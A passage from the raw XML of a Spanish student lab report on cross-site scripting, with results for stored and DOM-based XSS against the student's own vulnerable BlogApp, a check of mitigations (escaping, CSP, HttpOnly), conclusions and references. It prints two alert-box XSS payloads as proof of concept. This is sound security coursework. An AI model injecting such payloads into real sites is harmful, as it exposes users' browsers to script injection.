          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se publicó el payload &lt;script&gt;alert('Almacenado')&lt;/script&gt; en el formulario de comentarios de /almacenado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El payload fue guardado en la estructura de datos del servidor sin sanitizar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Al recargar la página, el script se ejecutó automáticamente sin ninguna interacción adicional.</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6.3 XSS DOM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se accedió a /dom con el fragmento #&lt;img src=x onerror=alert('DOM XSS')&gt; en la URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El servidor no recibió el fragmento (el hash no se envía al servidor por diseño del protocolo HTTP).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">JavaScript leyó location.hash y lo insertó con innerHTML, ejecutando el payload en el navegador.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.4 Verificación de mitigaciones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">escape() de markupsafe convirtió todos los caracteres peligrosos en entidades HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El header Content-Security-Policy fue verificado en DevTools → Network → Headers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Las cookies con HttpOnly no fueron accesibles desde document.cookie en la consola del navegador.</w:t>
      </w:r>
    </w:p>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7. Conclusiones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta práctica me permitió comprender de primera mano por qué el XSS sigue siendo una de las vulnerabilidades más explotadas en aplicaciones web. Desarrollar la aplicación BlogApp desde cero, incluyendo tanto las versiones vulnerables como las mitigadas, fue determinante para interiorizar la diferencia entre insertar datos de usuario directamente en el HTML y procesarlos correctamente antes de renderizarlos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Uno de los aprendizajes más importantes fue entender que el XSS basado en DOM es especialmente peligroso porque el servidor puede entregar HTML completamente legítimo y aun así el ataque ocurre en el cliente, lo que dificulta su detección con herramientas tradicionales de monitoreo del lado servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En cuanto a las mitigaciones, queda claro que no existe una solución única: la defensa en profundidad es la estrategia correcta. Combinar escape del output, una política CSP restrictiva, cookies con HttpOnly y validación de entradas en el servidor proporciona capas de protección que hacen prácticamente inviable la explotación exitosa de XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Como desarrollador, el principal cambio de mentalidad es tratar toda entrada del usuario como potencialmente maliciosa, independientemente del contexto. Esta práctica refuerza que la seguridad no es una característica que se agrega al final del desarrollo, sino una disciplina que debe integrarse desde el diseño de la aplicación.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Referencias</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation. (2021). OWASP Top 10:2021 — A03 Injection. Open Web Application Security Project. https://owasp.org/Top10/A03_2021-Injection/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation. (2023). Cross Site Scripting (XSS). OWASP Cheat Sheet Series. https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mozilla Developer Network. (2024). Content Security Policy (CSP). MDN Web Docs. https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pallets Projects. (2024). markupsafe — Safe string handling for HTML/XML. https://markupsafe.palletsprojects.com/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger. (2024). Cross-site scripting (XSS). Web Security Academy. https://portswigger.net/web-security/cross-site-scripting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808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Página </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="808080"/>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1F3864"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Seguridad Informática — Práctica 5: XSS</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">		</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="808080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">UPQ S-203 | Jesús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2026-06-27T16:53:19.319Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-27T16:53:19.320Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>